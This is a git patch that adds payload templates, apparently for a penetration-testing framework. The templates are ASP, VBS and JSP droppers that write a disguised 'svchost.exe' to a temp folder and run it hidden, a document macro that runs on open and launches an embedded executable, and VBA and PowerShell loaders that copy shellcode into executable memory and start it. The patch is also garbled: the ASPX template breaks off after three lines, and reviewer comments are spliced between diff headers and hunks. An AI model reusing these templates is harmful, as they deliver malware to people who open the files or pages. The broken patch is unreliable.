From c2cf822013378297d387a240196fe09ec03caf34 Mon Sep 17 00:00:00 2001
From: Shelby Spencer
Date: Tue, 20 Aug 2013 16:52:58 -0700
Subject: [PATCH] Commit adding the template scripts.
---
 .../templates/scripts/to_exe_asp.asp.template | 23 ++++++
 .../scripts/to_exe_aspx.aspx.template | 34 ++++++++
 data/templates/scripts/to_exe_vba.vb.template | 80 +++++++++++++++++++
 data/templates/scripts/to_exe_vbs.vb.template | 24 ++++++
 .../templates/scripts/to_jsp_war.war.template | 49 ++++++++++++
 data/templates/scripts/to_vba.vb.template | 32 ++++++++
 .../scripts/to_win32pe_psh.ps1.template | 19 +++++
 .../scripts/to_win32pe_psh_net.ps1.template | 30 +++++++
 8 files changed, 291 insertions(+)
 create mode 100644 data/templates/scripts/to_exe_asp.asp.template
 create mode 100644 data/templates/scripts/to_exe_aspx.aspx.template
 create mode 100644 data/templates/scripts/to_exe_vba.vb.template
 create mode 100644 data/templates/scripts/to_exe_vbs.vb.template
 create mode 100644 data/templates/scripts/to_jsp_war.war.template
 create mode 100644 data/templates/scripts/to_vba.vb.template
 create mode 100644 data/templates/scripts/to_win32pe_psh.ps1.template
 create mode 100644 data/templates/scripts/to_win32pe_psh_net.ps1.template
diff --git a/data/templates/scripts/to_exe_asp.asp.template b/data/templates/scripts/to_exe_asp.asp.template
new file mode 100644
index 0000000000..a4410a212a
--- /dev/null
+++ b/data/templates/scripts/to_exe_asp.asp.template
@@ -0,0 +1,23 @@
+<%
+ Sub %{var_func}()
+ %{var_bytes}=Chr(%{exe[0]})%{var_shellcode}
+ Dim %{var_obj}
+ Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
+ Dim %{var_stream}
+ Dim %{var_tempdir}
+ Dim %{var_tempexe}
+ Dim %{var_basedir}
+ Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
+ %{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
+ %{var_obj}.CreateFolder(%{var_basedir})
+ %{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
+ Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe},2,0)
+ %{var_stream}.Write %{var_bytes}
+ %{var_stream}.Close
+ Dim %{var_shell}
+ Set %{var_shell} = CreateObject("Wscript.Shell")
+ %{var_shell}.run %{var_tempexe}, 0, false
+ End Sub
+
+ %{var_func}
+%>
diff --git a/data/templates/scripts/to_exe_aspx.aspx.template b/data/templates/scripts/to_exe_aspx.aspx.template
new file mode 100644
index 0000000000..966741fc6f
--- /dev/null
+++ b/data/templates/scripts/to_exe_aspx.aspx.template
@@ -0,0 +1,34 @@
+<%@ Page Language="C#" AutoEventWireup="true" %>
+<%@ Import Namespace="System.IO" %>
+
diff --git a/data/templates/scripts/to_exe_vba.vb.template b/data/templates/scripts/to_exe_vba.vb.template
new file mode 100644
index 0000000000..52aec8ff72
--- /dev/null
+++ b/data/templates/scripts/to_exe_vba.vb.template
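Review bot: The ASP template has no comment describing its placeholder contract — `%{var_func}`, `%{var_obj}` and the other `%{var_*}` tokens are generator-substituted names, and `%{exe[0]}`/`%{var_shellcode}` look like generator-side expressions, but nothing in the file says so, whereas the to_exe_vba template in this commit opens with a header explaining how its output is used. A one-line comment after the opening `<%`, e.g. `' %{...} tokens are replaced by the generator before this file is emitted; do not rename them here`, would let a maintainer edit the template without reading the generator. The same is missing from the to_exe_vbs, to_jsp_war, to_vba and both to_win32pe_psh templates in this commit.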
@@ -0,0 +1,80 @@
+'**************************************************************
+'*
+'* This code is now split into two pieces:
+'* 1. The Macro. This must be copied into the Office document
+'* macro editor. This macro will run on startup.
+'*
+'* 2. The Data. The hex dump at the end of this output must be
+'* appended to the end of the document contents.
+'*
+'**************************************************************
+'*
+'* MACRO CODE
+'*
+'**************************************************************
+
+Sub Auto_Open()
+ %{func_name1}
+End Sub
+
+Sub %{func_name1}()
+ Dim %{var_appnr} As Integer
+ Dim %{var_fname} As String
+ Dim %{var_fenvi} As String
+ Dim %{var_fhand} As Integer
+ Dim %{var_parag} As Paragraph
+ Dim %{var_index} As Integer
+ Dim %{var_gotmagic} As Boolean
+ Dim %{var_itemp} As Integer
+ Dim %{var_stemp} As String
+ Dim %{var_btemp} As Byte
+ Dim %{var_magic} as String
+ %{var_magic} = "%{var_magic}"
+ %{var_fname} = "%(unknown).exe"
+ %{var_fenvi} = Environ("USERPROFILE")
+ ChDrive (%{var_fenvi})
+ ChDir (%{var_fenvi})
+ %{var_fhand} = FreeFile()
+ Open %{var_fname} For Binary As %{var_fhand}
+ For Each %{var_parag} in ActiveDocument.Paragraphs
+ DoEvents
+ %{var_stemp} = %{var_parag}.Range.Text
+ If (%{var_gotmagic} = True) Then
+ %{var_index} = 1
+ While (%{var_index} < Len(%{var_stemp}))
+ %{var_btemp} = Mid(%{var_stemp},%{var_index},4)
+ #Put %{var_fhand}, , %{var_btemp}
+ %{var_index} = %{var_index} + 4
+ Wend
+ ElseIf (InStr(1,%{var_stemp},%{var_magic}) > 0 And Len(%{var_stemp}) > 0) Then
+ %{var_gotmagic} = True
+ End If
+ Next
+ Close %{var_fhand}
+ %{func_name2}(%{var_fname})
+End Sub
+
+Sub %{func_name2}(%{var_farg} As String)
+ Dim %{var_appnr} As Integer
+ Dim %{var_fenvi} As String
+ %{var_fenvi} = Environ("USERPROFILE")
+ ChDrive (%{var_fenvi})
+ ChDir (%{var_fenvi})
+ %{var_appnr} = Shell(%{var_farg}, vbHide)
+End Sub
+
+Sub AutoOpen()
+ Auto_Open
+End Sub
+
+Sub Workbook_Open()
+ Auto_Open
+End Sub
+
+'**************************************************************
+'*
+'* PAYLOAD DATA
+'*
+'**************************************************************
+
+%{var_magic}%{data}
diff --git a/data/templates/scripts/to_exe_vbs.vb.template b/data/templates/scripts/to_exe_vbs.vb.template
new file mode 100644
index 0000000000..aa22756688
--- /dev/null
+++ b/data/templates/scripts/to_exe_vbs.vb.template
@@ -0,0 +1,24 @@
+Function %{var_func}()
+ %{var_bytes}=Chr(%{exe[0]})%{var_shellcode}
+
+ Dim %{var_obj}
+ Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
+ Dim %{var_stream}
+ Dim %{var_tempdir}
+ Dim %{var_tempexe}
+ Dim %{var_basedir}
+ Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
+ %{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
+ %{var_obj}.CreateFolder(%{var_basedir})
+ %{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
+ Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
+ %{var_stream}.Write %{var_bytes}
+ %{var_stream}.Close
+ Dim %{var_shell}
+ Set %{var_shell} = CreateObject("Wscript.Shell")
+ %{var_shell}.run %{var_tempexe}, 0, true
+ %{var_obj}.DeleteFile(%{var_tempexe})
+ %{var_obj}.DeleteFolder(%{var_basedir})
+End Function
+
+%{init}
diff --git a/data/templates/scripts/to_jsp_war.war.template b/data/templates/scripts/to_jsp_war.war.template
new file mode 100644
index 0000000000..400cf02317
--- /dev/null
+++ b/data/templates/scripts/to_jsp_war.war.template
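Review bot: In `%{func_name1}`, `Dim %{var_itemp} As Integer` and `Dim %{var_appnr} As Integer` are declared but never read or assigned in that Sub (`%{var_appnr}` is only used in `%{func_name2}`, which declares its own copy), so the two dead `Dim` lines can go. `Dim %{var_magic} as String` also writes lowercase `as` where every other declaration in the macro uses `As`. The same unused-declaration pattern appears in the to_jsp_war template (`String %{var_data} = "";` is never used afterwards) and in the to_win32pe_psh_net template, where `$%{var_output}` is assigned from `CompileAssemblyFromSource` and never referenced again.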
@@ -0,0 +1,49 @@
+<%@ page import="java.io.*" %>
+<%
+ String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
+ String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
+ String %{var_data} = "";
+
+ if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
+ {
+ %{var_exepath} = %{var_exepath}.concat(".exe");
+ }
+
+ FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath});
+ FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
+
+ int %{var_numbytes} = %{var_inputstream}.available();
+ byte %{var_bytearray}[] = new byte[%{var_numbytes}];
+ %{var_inputstream}.read(%{var_bytearray});
+ %{var_inputstream}.close();
+ byte[] %{var_bytes} = new byte[%{var_numbytes}/2];
+ for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2)
+ {
+ char %{var_char1} = (char) %{var_bytearray}[%{var_counter}];
+ char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1];
+ int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff;
+ %{var_comb} <<= 4;
+ %{var_comb} += Character.digit(%{var_char2}, 16) & 0xff;
+ %{var_bytes}[%{var_counter}/2] = (byte)%{var_comb};
+ }
+
+ %{var_outputstream}.write(%{var_bytes});
+ %{var_outputstream}.close();
+
+ if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
+ String[] %{var_fperm} = new String[3];
+ %{var_fperm}[0] = "chmod";
+ %{var_fperm}[1] = "+x";
+ %{var_fperm}[2] = %{var_exepath};
+ Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
+ if (%{var_proc}.waitFor() == 0) {
+ %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
+ }
+
+ File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
+ }
+ else
+ {
+ Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
+ }
+%>
diff --git a/data/templates/scripts/to_vba.vb.template b/data/templates/scripts/to_vba.vb.template
new file mode 100644
index 0000000000..036d3ccc76
--- /dev/null
+++ b/data/templates/scripts/to_vba.vb.template 
@@ -0,0 +1,32 @@
+#If Vba7 Then
+ Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As LongPtr, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As LongPtr
+ Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As LongPtr
+ Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As LongPtr, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As LongPtr
+#Else
+ Private Declare Function CreateThread Lib "kernel32" (ByVal %{var_lpThreadAttributes} As Long, ByVal %{var_dwStackSize} As Long, ByVal %{var_lpStartAddress} As Long, %{var_lpParameter} As Long, ByVal %{var_dwCreationFlags} As Long, %{var_lpThreadID} As Long) As Long
+ Private Declare Function VirtualAlloc Lib "kernel32" (ByVal %{var_lpAddr} As Long, ByVal %{var_lSize} As Long, ByVal %{var_flAllocationType} As Long, ByVal %{var_flProtect} As Long) As Long
+ Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal %{var_lDest} As Long, ByRef %{var_Source} As Any, ByVal %{var_Length} As Long) As Long
+#EndIf
+
+Sub Auto_Open()
+ Dim %{var_myByte} As Long, %{var_myArray} As Variant, %{var_offset} As Long
+#If Vba7 Then
+ Dim %{var_rwxpage} As LongPtr, %{var_res} As LongPtr
+#Else
+ Dim %{var_rwxpage} As Long, %{var_res} As Long
+#EndIf
+ %{var_myArray} = Array(%{bytes})
+ %{var_rwxpage} = VirtualAlloc(0, UBound(%{var_myArray}), &H1000, &H40)
+ For %{var_offset} = LBound(%{var_myArray}) To UBound(%{var_myArray})
+ %{var_myByte} = %{var_myArray}(%{var_offset})
+ %{var_res} = RtlMoveMemory(%{var_rwxpage} + %{var_offset}, %{var_myByte}, 1)
+ Next %{var_offset}
+ %{var_res} = CreateThread(0, 0, %{var_rwxpage}, 0, 0, 0)
+End Sub
+Sub AutoOpen()
+ Auto_Open
+End Sub
+Sub Workbook_Open()
+ Auto_Open
+End Sub
+
diff --git a/data/templates/scripts/to_win32pe_psh.ps1.template b/data/templates/scripts/to_win32pe_psh.ps1.template
new file mode 100644
index 0000000000..e23d3719c4
--- /dev/null
+++ b/data/templates/scripts/to_win32pe_psh.ps1.template
@@ -0,0 +1,19 @@
+$%{var_code} = @"
+[DllImport("kernel32.dll")]
+public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+[DllImport("kernel32.dll")]
+public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+[DllImport("msvcrt.dll")]
+public static extern IntPtr memset(IntPtr dest, uint src, uint count);
+"@
+
+$%{var_win32_func} = Add-Type -memberDefinition $%{var_code} -Name "Win32" -namespace Win32Functions -passthru
+[Byte[]]$%{var_payload} = 0x%{code[0].to_s(16)}%{shellcode}
+
+$%{var_size} = 0x1000
+
+if ($%{var_payload}.Length -gt 0x1000) {$%{var_size} = $%{var_payload}.Length}
+$%{var_rwx}=$%{var_win32_func}::VirtualAlloc(0,0x1000,$%{var_size},0x40)
+for ($%{var_iter}=0;$%{var_iter} -le ($%{var_payload}.Length-1);$%{var_iter}++) {$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_payload}[$%{var_iter}], 1)}
+$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)
+
diff --git a/data/templates/scripts/to_win32pe_psh_net.ps1.template b/data/templates/scripts/to_win32pe_psh_net.ps1.template
new file mode 100644
index 0000000000..027d586bb8
--- /dev/null
+++ b/data/templates/scripts/to_win32pe_psh_net.ps1.template
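Review bot: The `Add-Type` call in the to_win32pe_psh template mixes parameter casing — `-memberDefinition`, `-namespace` and `-passthru` next to `-Name` — where the conventional PowerShell spelling is `-MemberDefinition`, `-Namespace` and `-PassThru`; PowerShell accepts either, so this is a point of style only. `$%{var_rwx}=$%{var_win32_func}::VirtualAlloc(...)` also drops the spaces around `=` that every other assignment in the file keeps. The companion to_win32pe_psh_net template opens with `Set-StrictMode -Version 2` while this one does not, which is presumably deliberate but worth a one-line comment so the two templates do not drift apart silently.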
@@ -0,0 +1,30 @@
+Set-StrictMode -Version 2
+$%{var_syscode} = @"
+ using System;
+ using System.Runtime.InteropServices;
+ namespace %{var_kernel32} {
+ public class func {
+ [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
+ [Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
+ [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
+ [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+ [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+ [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
+ }
+ }
+"@
+
+$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
+$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
+$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
+$%{var_compileParams}.GenerateInMemory = $True
+$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
+
+[Byte[]]$%{var_code} = 0x%{code[0].to_s(16)}%{shellcode}
+
+$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
+if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
+[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
+if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
+$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)